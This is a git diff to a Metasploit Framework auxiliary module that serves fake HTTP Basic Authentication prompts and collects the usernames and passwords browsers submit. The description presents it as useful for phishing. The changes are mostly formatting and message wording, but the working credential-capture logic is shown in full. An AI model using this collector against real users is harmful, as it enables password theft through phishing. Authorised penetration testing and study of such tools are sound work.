diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 061c6db69f..0630c697b4 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -1,18 +1,23 @@ -require 'msf/core' +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## +require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report - def initialize - super( - 'Name' => 'HTTP Client Credential Catcher', - 'Version' => '$Revision: $', + def initialize(info={}) + super(update_info(info, + 'Name' => 'HTTP Client Basic Authentication Credential Collector', 'Description' => %q{ This module responds to all requests for resources with a HTTP 401. This should - cause most browsers to prompt for credentials. If the user enters Basic Auth creds + cause most browsers to prompt for a credential. If the user enters Basic Auth creds they are sent to the console. This may be helpful in some phishing expeditions where it is possible to embed a @@ -20,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary This attack is discussed in Chapter 3 of The Tangled Web by Michal Zalewski. }, - 'Author' => ['saint patrick '], + 'Author' => ['saint patrick '], 'License' => MSF_LICENSE, 'Actions' => [ @@ -31,12 +36,12 @@ class Metasploit3 < Msf::Auxiliary 'Capture' ], 'DefaultAction' => 'Capture' - ) + )) register_options( [ - OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), - OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]), + OptPort.new('SRVPORT', [ true, "The local port to listen on.", 80 ]), + OptString.new('REALM', [ true, "The authentication realm you'd like to present.", "Secure Site" ]) ], self.class) end @@ -51,38 +56,32 @@ class Metasploit3 < Msf::Auxiliary @realm = datastore['REALM'] print_status("Listening on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}...") - exploit() + exploit end def on_request_uri(cli, req) - phost = cli.peerhost - mysrc = Rex::Socket.source_address(cli.peerhost) - - if(req['Authorization'] and req['Authorization'] =~ /basic/i) basic,auth = req['Authorization'].split(/\s+/) user,pass = Rex::Text.decode_base64(auth).split(':', 2) report_auth_info( - :host => cli.peerhost, - :port => datastore['SRVPORT'], - :sname => 'HTTP', - :user => user, - :pass => pass, + :host => cli.peerhost, + :port => datastore['SRVPORT'], + :sname => 'HTTP', + :user => user, + :pass => pass, :source_type => "captured", - :active => true + :active => true ) - print_status("HTTP LOGIN #{cli.peerhost} > :#{@myport} #{user} / #{pass} => #{req.resource}") + print_good("#{cli.peerhost} - Credential collected: \"#{user}:#{pass}\" => #{req.resource}") send_not_found(cli) else + print_status("Sending 401 to client") response = create_response(401, "Unauthorized") response.headers['WWW-Authenticate'] = "Basic realm=\"#{@realm}\"" cli.send_response(response) end - - return - end end